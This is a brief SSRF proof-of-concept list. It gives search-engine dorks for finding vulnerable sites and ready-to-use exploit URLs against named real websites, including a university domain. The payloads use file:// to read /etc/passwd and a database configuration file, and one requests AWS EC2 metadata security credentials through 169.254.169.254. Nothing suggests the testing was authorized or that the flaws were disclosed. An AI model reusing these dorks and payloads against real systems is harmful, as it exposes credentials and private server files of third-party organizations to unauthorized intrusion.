SSRF POC

Dork for finding SSRF Vuln websites:

site:somaiya.edu.in ext:php inurl:download.php

site:*.com inurl:?filename=  filetype:pdf

-----------------------------------------------------------

Site-1: mop4.com

https://mop4.com/?url=file:///etc/passwd

-----------------------------------------------------------

Site-2: exclusivecapitalrating.com

https://exclusivecapitalrating.com/proxy.php?url=file:///etc/passwd

-----------------------------------------------------------

Site-3: www.somaiya.edu.in

https://www.somaiya.edu.in/download.php?pdf_path=file:///etc/passwd

https://www.somaiya.edu.in/download.php?pdf_path=file:///proc/self/cwd/arigel/config/database.php

https://www.somaiya.edu.in/download.php?pdf_path=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

-----------------------------------------------------------

Site-3: stanford.edu

https://171.64.74.20/lib/exe/fetch.php?media=wiki:dokuwiki.svg